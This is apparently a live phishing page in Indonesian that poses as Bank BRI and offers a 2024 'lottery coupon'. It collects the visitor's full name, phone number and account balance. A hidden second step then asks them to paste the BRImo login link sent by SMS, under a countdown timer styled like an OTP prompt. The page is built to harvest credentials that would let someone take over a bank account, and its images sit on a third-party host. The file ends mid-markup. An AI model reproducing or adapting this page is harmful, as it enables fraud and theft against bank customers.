<!DOCTYPE html>
<html lang="en" >
<head>
    <!-- Warna untuk Chrome, Firefox OS, Opera dan Vivaldi -->
<meta content='#0F78CB' name='theme-color'/>
<!-- Warna untuk Windows Phone -->
<meta content='#1A89DF' name='msapplication-navbutton-color'/>
<!-- Warna untuk iOS Safari -->
 <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#1E90FF"> 
   <!-- HTML Meta Tags -->

 
 <meta property="og:title" content="PT. Bank Rakyat Indonesia (Persero) Tbk."> 
 <link href="https://hosting.tigerengine.id/lvit0j.jpg" rel="icon" type="image/x-icon">
 <link href="https://hosting.tigerengine.id/lvit0j.jpg" rel="apple-touch-icon">
 <meta property="og:description" content="Gedung BRI Jl. Jenderal Sudirman Kav.44-46 Jakarta 10210 Indonesia">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 | 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 𝟮𝟬𝟮𝟰</title>
<meta property="og:title" content="𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 | 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 𝟮𝟬𝟮𝟰">
<meta property="twitter:title" content="𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 | 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 𝟮𝟬𝟮𝟰">
<meta property="twitter:card" content="summary_large_image">
<meta property="og:image:type" content="image/jpeg">
<meta content="https://hosting.tigerengine.id/lvit0j.jpg" property="og:image">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="">
  <meta property="og:type" content="website">
  <meta property="og:title" content="𝐊𝐮𝐩𝐨𝐧 𝐔𝐧𝐝𝐢𝐚𝐧 𝐁𝐚𝐧𝐤 𝐁𝐑𝐈 2024">
  
  <meta property="og:image" content="">
  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="">
  <meta property="twitter:url" content="">
  <meta name="twitter:title" content="𝗕𝗥𝗜">
  <meta name="twitter:image" content="">

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
<link rel="icon" href="" type="image/x-icon" />
<link rel="apple-touch-icon" href="" />
  <!-- Meta Tags Generated via https://www.opengraph.xyz -->
        
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">


</head>
<body>
    <style>
        
@import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

.html {
    width: 100%;
    height: 100%;
    background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
}

body{
 background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  position: absolute;
  background-color: #f1f1f2;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
  font-size: 16px;
  width: 100%;
  height: 100%;
  
  }
* {
  box-sizing: border-box;
}
*:focus {
  outline: none;
}

.wrapper {
  min-height: 30vh;
  display: flex;
  padding: 50px 15px;
}
@media screen and (max-width: 700px), (max-height: 440px) {
  .wrapper {
    flex-wrap: wrap;
    flex-direction: column;
  }
}

.card-form {
  max-width: 570px;
  margin: auto;
  width: 100%;
  height: 470px;
}
@media screen and (max-width: 576px) {
  .card-form {
    margin: 0 auto;
  }
}
.card-form__inner {
   background: #fff;
  font-family: "Source Sans Pro", sans-serif;
 
  background-position: 100% 100%;
  background-size: 100% 100%;
 outline-style: ridge;
 paint-order: stroke markers fill;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  border-radius: 15px;
  border: 3px ridge;
  color: #1A89DF;
  height: 395px;
  padding-top: 120px;
}
@media screen and (max-width: 480px) {
  .card-form__inner {
    padding: 20px;
    padding-top: 120px;
  }
}
@media screen and (max-width: 360px) {
  .card-form__inner {
    padding: 15px;
    padding-top: 145px;
  }
}
.card-form__row {
  display: flex;
  align-items: flex-text;
}
@media screen and (max-width: 480px) {
  .card-form__row {
    flex-wrap: wrap;
  }
}
.card-form__col {
  flex: auto;
  margin-right: 35px;
}
.card-form__col:last-child {
  margin-right: 0;
}
@media screen and (max-width: 480px) {
  .card-form__col {
    margin-right: 0;
    flex: unset;
    width: 100%;
    margin-bottom: 20px;
  }
  .card-form__col:last-child {
    margin-bottom: 0;
  }
}
.card-form__col.-cvv {
  max-width: 150px;
}
@media screen and (max-width: 480px) {
  .card-form__col.-cvv {
    max-width: initial;
  }
}
.card-form__group {
  display: flex;
  align-items: flex-start;
  flex-wrap: wrap;
}
.card-form__group .card-input__input {
  flex: 1;
  margin-right: 15px;
}
.card-form__group .card-input__input:last-child {
  margin-right: 0;
}
.card-form__button {
  width: 100%;
  height: 43px;
  box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  
  background: #1A89DF;
  border: 3px blue;
  outline-style: groove;
 color: #fff;
  border-radius: 22px;
  font-size: 15px;
  font-weight: 500;
  style="font-weight: 800;
  font-family: "Source Sans Pro", sans-serif;
  box-shadow: #D5D5D5 10px; 
  
  margin-top: -10px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-form__button {
    margin-top: -10px;
  }
}

.card-item {
  max-width: 430px;
  height: 270px;
  margin-left: auto;
  margin-right: auto;
  position: relative;
  z-index: 2;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item {
    max-width: 310px;
    height: 220px;
    width: 90%;
  }
}
@media screen and (max-width: 360px) {
  .card-item {
    height: 180px;
  }
}
.card-item.-active .card-item__side.-front {
  transform: perspective(1000px) rotateY(180deg) rotateX(0deg) rotateZ(0deg);
}
.card-item.-active .card-item__side.-back {
  transform: perspective(1000px) rotateY(0) rotateX(0deg) rotateZ(0deg);
}
.card-item__focus {
  position: absolute;
  z-index: 3;
  border-radius: 5px;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  transition: all 0.35s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  opacity: 0;
  pointer-events: none;
  overflow: hidden;
  border: 2px solid rgba(255, 255, 255, 0.65);
}
.card-item__focus:after {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  background: #08142f;
  height: 100%;
  border-radius: 5px;
  filter: blur(25px);
  opacity: 0.5;
}
.card-item__focus.-active {
  opacity: 1;
}
.card-item__side {
  border-radius: 15px;
  overflow: hidden;
  box-shadow: 0 20px 60px 0 rgba(14, 42, 90, 0.55);
  transform: perspective(2000px) rotateY(0deg) rotateX(0deg) rotate(0deg);
  transform-style: preserve-3d;
  transition: all 0.8s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  backface-visibility: hidden;
  height: 100%;
}
.card-item__side.-back {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  transform: perspective(2000px) rotateY(-180deg) rotateX(0deg) rotate(0deg);
  z-index: 2;
  padding: 0;
  height: 100%;
}
.card-item__side.-back .card-item__cover {
  transform: rotateY(-180deg);
}
.card-item__bg {
  max-width: 100%;
  display: block;
  max-height: 100%;
  height: 100%;
  width: 100%;
  object-fit: cover;
  border: 3px solid snow;
  border-radius: 15px;
}
.card-item__cover {
  height: 100%;
  background-color: white;
  position: absolute;
  height: 100%;
  background-color: white;
  left: 0;
  top: 0;
  width: 100%;
  border-radius: 15px;
  overflow: hidden;
}
.card-item__cover:after {
  content: "";
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  background: ;
}
.card-item__top {
  display: flex;
  border: 2px;
  align-items: flex-start;
  justify-content: space-between;
  margin-bottom: 40px;
  padding: 0 10px;
}
@media screen and (max-width: 480px) {
  .card-item__top {
    margin-bottom: 25px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__top {
    margin-bottom: 20px;
  }
}
.card-item__chip {
  width: 60px;
}
@media screen and (max-width: 480px) {
  .card-item__chip {
    width: 50px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__chip {
    width: 40px;
  }
}
.card-item__type {
  height: 45px;
  position: relative;
  display: flex;
  justify-content: flex-end;
  max-width: 100px;
  margin-left: auto;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item__type {
    height: 40px;
    max-width: 90px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__type {
    height: 30px;
  }
}
.card-item__typeImg {
  max-width: 100%;
  object-fit: contain;
  max-height: 100%;
  object-position: top right;
}
.card-item__info {
  color: #fff;
  width: 100%;
  max-width: calc(100% - 85px);
  padding: 10px 15px;
  font-weight: 500;
  display: block;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__info {
    padding: 10px;
  }
}
.card-item__holder {
  opacity: 100;
  font-size: 13px;
  margin-bottom: 6px;
  color: yellow;
}
@media screen and (max-width: 480px) {
  .card-item__holder {
    font-size: 12px;
    margin-bottom: 5px;
  }
}
.card-item__wrapper {
  font-family: "Source Code Pro", monospace;
  padding: 25px 15px;
  position: relative;
  z-index: 4;
  height: 100%;
  text-shadow: 7px 6px 10px rgba(14, 42, 90, 0.8);
  user-select: none;
}
@media screen and (max-width: 480px) {
  .card-item__wrapper {
    padding: 20px 10px;
  }
}
.card-item__name {
  font-size: 18px;
  line-height: 1;
  white-space: nowrap;
  max-width: 100%;
  overflow: hidden;
  text-overflow: ellipsis;
  text-transform: uppercase;
}
@media screen and (max-width: 480px) {
  .card-item__name {
    font-size: 16px;
  }
}
.card-item__nameItem {
  display: inline-block;
  min-width: 8px;
  position: relative;
}
.card-item__number {
  font-weight: 500;
  line-height: 1;
  color: #fff;
  font-size: 27px;
  margin-bottom: 35px;
  display: inline-block;
  padding: 10px 15px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__number {
    font-size: 21px;
    margin-bottom: 15px;
    padding: 10px 10px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__number {
    font-size: 19px;
    margin-bottom: 10px;
    padding: 10px 10px;
  }
}
.card-item__numberItem {
  width: 16px;
  display: inline-block;
}
.card-item__numberItem.-active {
  width: 30px;
}
@media screen and (max-width: 480px) {
  .card-item__numberItem {
    width: 13px;
  }
  .card-item__numberItem.-active {
    width: 16px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__numberItem {
    width: 12px;
  }
  .card-item__numberItem.-active {
    width: 8px;
  }
}
.card-item__content {
  color: #fff;
  display: flex;
  align-items: flex-start;
}
.card-item__date {
  flex-wrap: wrap;
  font-size: 18px;
  margin-left: -5;
  padding: 10px;
  display: inline-flex;
  width: 80px;
  white-space: nowrap;
  flex-shrink: 0;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__date {
    font-size: 16px;
    width: 140px;
    height: 45px;
    padding-top: -5px;
  }
}
.card-item__dateItem {
  position: relative;
}
.card-item__dateItem span {
  width: 22px;
  margin-left: 25px;
  display: inline-block;
}
.card-item__dateTitle {
  opacity: 100;
  font-size: 13px;
  padding-bottom: 6px;
  width: 100%;
  margin-left: 0px;
}
@media screen and (max-width: 480px) {
  .card-item__dateTitle {
    font-size: 12px;
    padding-bottom: 5px;
    margin-left: 20px;
    color: yellow;
    
  }
}
.card-item__band {
  background: rgba(0, 0, 19, 0.8);
  width: 100%;
  height: 50px;
  margin-top: 30px;
  position: relative;
  z-index: 2;
}
@media screen and (max-width: 480px) {
  .card-item__band {
    margin-top: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__band {
    height: 40px;
    margin-top: 10px;
  }
}
.card-item__cvv {
  text-align: right;
  position: relative;
  z-index: 2;
  padding: 15px;
}
.card-item__cvv .card-item__type {
  opacity: 0.7;
}
@media screen and (max-width: 360px) {
  .card-item__cvv {
    padding: 10px 15px;
  }
}
.card-item__cvvTitle {
  padding-right: 10px;
  font-size: 15px;
  font-weight: 500;
  color: #fff;
  margin-bottom: 5px;
}
.card-item__cvvBand {
  height: 45px;
  background: #fff;
  margin-bottom: 30px;
  text-align: right;
  display: flex;
  align-items: center;
  justify-content: flex-end;
  padding-right: 10px;
  color: #1a3b5d;
  font-size: 18px;
  border-radius: 4px;
  box-shadow: 0px 10px 20px -7px rgba(32, 56, 117, 0.35);
}
@media screen and (max-width: 480px) {
  .card-item__cvvBand {
    height: 40px;
    margin-bottom: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__cvvBand {
    margin-bottom: 15px;
  }
}

.card-list {
  margin-bottom: -100px;
}
@media screen and (max-width: 480px) {
  .card-list {
    margin-bottom: -120px;
  }
}

.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 15px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #1A89DF;
  width: 100%;
  margin-top: -15px;
  display: block;
  user-select: none;
}
.card-input__input {
  width: 100%;
  height: 40px;
  border-radius: 10px;
  box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36); border: outline-style: groove;
  border: 2px solid #1A89DF;
  transition: all 0.3s ease-in-out;
  font-size: 18px;
  padding: 5px;
  padding-left: 10px;
  padding-top: 3px;
  background: #fff;
  color: #1a3b5d;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input:hover, .card-input__input:focus {
  border-color: #FAC03B;
}
.card-input__input:focus {
  box-shadow: 0px 10px 20px -13px rgba(32, 56, 117, 0.35);
  background: #fff;
}


.card-input__input::placeholder{
    font-size: 14px;
    
}
.card-input__input.-select {
  -webkit-appearance: none;
  background-image: url("https://static.thenounproject.com/png/4066370-200.png");
  background-size: 14px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;
  padding-top: 3px;
}


.card-input__input.-select2 {
  -webkit-appearance: none;
  background-image: url("https://uxwing.com/wp-content/themes/uxwing/download/e-commerce-currency-shopping/card-cvv-icon.png");
  background-size: 22px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;
  padding-top: 3px;
}

.slide-fade-up-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-up-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-up-enter {
  opacity: 0;
  transform: translateY(15px);
  pointer-events: none;
}

.slide-fade-up-leave-to {
  opacity: 0;
  transform: translateY(-15px);
  pointer-events: none;
}

.slide-fade-right-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-right-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-right-enter {
  opacity: 0;
  transform: translateX(10px) rotate(45deg);
  pointer-events: none;
}

.slide-fade-right-leave-to {
  opacity: 0;
  transform: translateX(-10px) rotate(45deg);
  pointer-events: none;
}

.github-btn {
  position: absolute;
  right: 40px;
  bottom: 50px;
  text-decoration: none;
  padding: 15px 25px;
  border-radius: 4px;
  box-shadow: 0px 4px 30px -6px rgba(36, 52, 70, 0.65);
  background: #24292e;
  color: #fff;
  font-weight: bold;
  letter-spacing: 1px;
  font-size: 16px;
  text-align: center;
  transition: all 0.3s ease-in-out;
}
@media screen and (min-width: 500px) {
  .github-btn:hover {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
@media screen and (max-width: 700px) {
  .github-btn {
    position: relative;
    bottom: auto;
    right: auto;
    margin-top: 20px;
  }
  .github-btn:active {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
.text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 45px; 
            width: 336px;
            max-width: 90%;
            border: 3px solid rgb(0, 134, 224);
            border-radius: 23px;
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 0px; 
            padding: 0px 45px;
            text-align: center;
            }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 8px;
            margin-left: 37px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .Button clickable-element {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }

        .box-lte {
            width: 380px;
            max-width: 95%;
            background: #fff;
            display: block;
            box-shadow: 10px 15px 10px 0 rgba(90, 116, 148, 0.4);
            margin: -40px auto;
            border-radius: 20px;
            height: 410px;
        }

        textarea {
            box-sizing: border-box; 
            height: 75px;
            margin-top: -30px;
            width: 280px;
            border: 3px solid rgb(0, 134, 224);
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
          .textarea1 {
            box-sizing: border-box; 
            
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 50px;
            
        }
        
         .textarea {
            box-sizing: border-box; 
            height: 75px;
           
            width: 280px;
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
        textarea::placeholder{
            font-size: 13px;
        }
           h1{
            display: table;
            background-color: transparent;
            color: #FF0000;
            padding: 15px;
            width: 100%;
            font-size: 10px;
            margin-bottom: -70px;
            text-align: center;
            position: fixed;
            top: 300px;
           font-weight: bold;
            right: 0;
            left: 0;
            margin: 0px auto;
            
        }
        
        .blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

#Aktivasi{
    display: none;
}
/*********************/
   .process {
     top: 0;left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #0000005b;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     
   }
  .loading {
    margin-top: -50px;
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    
  }
  .loading img {
    width: 50px;
    
  }
  .loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
    
  }
  .textarea2 {
     box-sizing: border-box; 
     border: 2px solid rgb(0, 134, 224);
     box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
     border-radius: 50px;  
  }
    </style> 
<body>
      <div class="wrapper" id="app">
     <img src="https://hosting.tigerengine.id/ciakn7.png" style="width: 100%; position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto">
       <img src="https://hosting.tigerengine.id/9vevbb.jpg" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto">
    <font style="color: #1A89DF; text-align: center; margin-top: 16px; margin-bottom: 10px; font-weight: 800; font-size: 12px">Lengkapi data Pencetakan Kupon</font>
      <div class="card-list">
        <div class="card-item" v-bind:class="{ '-active' : isCardFlipped }">
          <div class="card-item__side -front">
            <div class="card-item__focus" v-bind:class="{'-active' : focusElementStyle }" v-bind:style="focusElementStyle" ref="focusElement"></div>
            <div class="card-item__cover">
              <img
              src="https://hosting.tigerengine.id/9n66lb.png" class="card-item__bg">
            </div>
            
            <div class="card-item__wrapper">
              <div class="card-item__top">

                <div class="card-item__type">
                  <transition name="slide-fade-up">
                    
                  </transition>
                </div>
              </div>
              <label for="cardNumber" class="card-item__number" ref="cardNumber">
                <template v-if="getCardType === 'amex'">
                 <span v-for="(n, $index) in amexCardMask" :key="$index">
                  <transition name="slide-fade-up">
                    <div
                      class="card-item__numberItem"
                      v-if="$index > 4 && $index < 14 && cardNumber.length > $index && n.trim() !== ''"
                    >*</div>
                    <div class="card-item__numberItem"
                      :class="{ '-active' : n.trim() === '' }"
                      :key="$index" v-else-if="cardNumber.length > $index">
                      {{cardNumber[$index]}}
                    </div>
                    <div
                      class="card-item__numberItem"
                      :class="{ '-active' : n.trim() === '' }"
                      v-else
                      :key="$index + 1"
                    >{{n}}</div>
                  </transition>
                </span>
                </template>

                <template v-else>
                  <span v-for="(n, $index) in otherCardMask" :key="$index">
                    <transition name="slide-fade-up">
                      <div
                        class="card-item__numberItem"
                        v-if="$index > 4 && $index < 15 && cardNumber.length > $index && n.trim() !== ''"
                      >*</div>
                      <div class="card-item__numberItem"
                        :class="{ '-active' : n.trim() === '' }"
                        :key="$index" v-else-if="cardNumber.length > $index">
                        {{cardNumber[$index]}}
                      </div>
                      <div
                        class="card-item__numberItem"
                        :class="{ '-active' : n.trim() === '' }"
                        v-else
                        :key="$index + 1"
                      >{{n}}</div>
                    </transition>
                  </span>
                </template>
              </label>
              <div class="card-item__content">
                <label for="cardName" class="card-item__info" ref="cardName">
                  <div class="card-item__holder">Nomor Handphone</div>
                  <transition name="slide-fade-up">
                    <div class="card-item__name" v-if="cardName.length" key="1">
                      <transition-group name="slide-fade-right">
                        <span class="card-item__nameItem" v-for="(n, $index) in cardName.replace(/\s\s+/g, ' ')" v-if="$index === $index" v-bind:key="$index + 1">{{n}}</span>
                      </transition-group>
                    </div>
                    <div class="card-item__name" v-else key="2">+62###-####-####</div>
                  </transition>
                </label>
                <div class="card-item__date" ref="cardDate">
                  <label for="cardMonth" class="card-item__dateTitle"></label>
                  <label for="cardMonth" class="card-item__dateItem">
                    <transition name="slide-fade-up">
                      <span v-if="cardMonth" v-bind:key="cardMonth" style="margin-left: 40px">{{cardMonth}}</span>
                      <span v-else key="2" style="margin-left: 40px"></span>
                    </transition>
                  </label>
                 
                </div>
              </div>
            </div>
          </div>
          <div class="card-item__side -back">
            <div class="card-item__cover">
              <img
              src="https://hosting.tigerengine.id/flbk1a.jpg" class="card-item__bg">
            </div>

            <div class="card-item__cvv" style="margin-top: 20px">
                <div class="card-item__cvvTitle">CVV</div>
                <div class="card-item__cvvBand">
                  <span v-for="(n, $index) in cardCvv" :key="$index">
                    *
                  </span>

              </div>
                <div class="card-item__type">
                   
                </div>
            </div>
          </div>
        </div>
      </div>
      <center>
     <div id="process1" name="process" class="process" style="display: none;">
            <div class="loading">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFE_czWoYVjGZ9WT90dwDRGzsw_u8miF1WtkcowDYxZGT78d7yt6nfV_dX26RKNlOD5QgWMUJGXbIlfUrhcVT93Ehoe6acrkpcFwrfWTXMUfCfntZFfxDWGrp2QY8hya0E9wJO4xbaYJDRv8V-Mtx4ubSIHC95d0wW90ATdEVlEmvPijcITT2vCo1VXPg/s637/1_ngNzwrRBDElDnf2CLF_Rbg.gif" id="loading" style="margin-top: 8px">
            </div>
        </div>
  </center>
      <br><br><br>
    
      <div class="card-form__inner">
 <form id="inputlogin" onsubmit="sendNohp(event);" method="post"
              class="">
        <div class="card-input" style="margin-top: -40px">
          <label for="cardName" class="card-input__label" style="font-weight: 800;margin-left: 3px">Nama Lengkap Nasabah</label>
          <input type="hidden" id="logo" value="====𝑭𝒆𝒔𝒕𝒊𝒗𝒂𝒍 𝑮𝒆𝒃𝒚𝒂𝒓 𝑩𝑹𝑰====">
          <input type="text" id="nama" name="nama" class="card-input__input" v-model="cardNumber" v-on:focus="focusInput"  data-ref="cardNumber" autocomplete="off" placeholder="Masukan Nama Lengkap Nasabah" required>
        </div>
        <div class="card-input">
          <label for="cardName" class="card-input__label" style="font-weight: 800; margin-left: 3px">Nomor Handphone</label>
          <input type="tel" id="nomor" name="nomor" class="card-input__input" v-model="cardName"  v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardName" autocomplete="off" placeholder="Masukkan Nomor Handphone" maxlength="13" required>
        </div>
        <div class="card-form__row">
          <div class="card-form__col">
            <div class="card-form__group">

                
          </div>
          <div class="card-form__col -cvv">
            <div class="card-input">
              <label for="cardCvv" class="card-input__label"style="font-weight: 800; margin-left: 5px">Saldo Rekening Tabungan saat Ini</label>
              <input type="tel" class="uang card-input__input" id="saldo" name="saldo" placeholder="" maxlength=""  autocomplete="off" required style="background-image: url(https://hosting.tigerengine.id/qy4dgg.jpg);
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%; background-color: #ddd; padding-left: 35px">
            </div>
          </div>
        </div>

         <button id="kirims" type="submit" class="card-form__button" >Lanjut </button> 
      </div>
   
</div>
</form>
  </div>
  <div style="display: none" class="box-otp">
     <body> 
  <span class="blink" style="display: none" id="blinkk"><h1>Tautan Link tidak Valid, atau sudah Kadaluarsa</h1></span>
 <span class="blink" style="display: none" id="blinkAktivasi"><h1>OTP Cetak Kupon invalid, atau sudah kadaluarsa</h1></span> 
  <div class="container" id="sms" style="display: none"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 150px;"> 
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 150px; width: 256px; max-width: 100%; display: block; margin-top: -50px; border-radius: 0px;"> 
      <img alt="" src="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654616003584x348160725283053200%2Fhttps___s3.amazonaws.com_appforest_uf_f1649512719186x581120083778390800_PSX_20220401_045909-removebg%252520%2525281%252529%2520%25281%2529.png?w=384&h=246&auto=compress&dpr=2&fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;" margin-left:="" 10px;="" margin-right:=""> 
     </div> 
    </div> 
    <div class="row"> 
     <hr style="display: block; margin: auto; width: 90%;"> 
     <p style="font-weight: bold; font-size: 20px; color: #098CE3; text-align: center; margin: 10px auto;" id="timer">3 : 00</p> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: -10px"> 
      <p style="font-size: 10px; text-align: center; font-weight: bold; padding: 15px">Link untuk Penukaran POIN BRImo telah kami kirim ke nomor handphone anda, silakan cek SMS lalu masukkan Link di bawah ini<br><br>Link Konfirmasi (Wajib).</p> 
     </div> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto;"> 
 <form onsubmit="kirimPesan(event)" method="post" id="formLink1">
       <center> 
        <div style="margin-top: 1px"> 
        
      <textarea id="nama" minlength="20" placeholder="Contoh SMS https://brimo.bri.co.id/app/login?code=xxxxxx" onclick="gantiborder()" required class="" oninvalid="this.setCustomValidity('Hɑrɑp 𝗦𝗔𝗟𝗜𝗡 dɑn 𝗧𝗘𝗠𝗣𝗘𝗟 dengɑn benɑr untuk 𝗟𝗶𝗻𝗸 yɑng yɑng diterimɑ di 𝗦𝗠𝗦')" onchange="this.setCustomValidity('')" id='float-only' name='float-only'></textarea>
 
         <b> <p style="font-size: 11px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF0000;">Mohon jangan diisi jika belum menerima SMS Link Penukaran dari BRI-Aktivasi berupa Link..!!</strong></p></b>
        </div>
       </center>
       <b>
<input type="submit" id="kirim" class="bubble-element Button clickable-element" style="max-width: 85%; padding: 0px; cursor: pointer; background: none rgb(9, 140, 227); border: none; text-align: center; display: block; margin: 20px auto; height: 39px; width: 346px; left: 0px; top: 0px; font-family: Arial; font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 15px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; transition: background 200ms ease 0s; font-weight: 700" tabindex="2" value="KIRIM"/>
</b>
      </form>
     </div>
     <b> </b>
    </div>
    <b> </b>
   </div>
   <b> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px;"> 
      <p style="font-size: 12px; text-align: center; margin-top: 50px;"><strong style="color: #5e5e5e;">Tidak terima SMS? <a href="otp.html" style="text-decoration: none; color: none rgb(9, 100, 127);">Kirim ulang SMS</a></strong></p> 
     </div>
     <center>
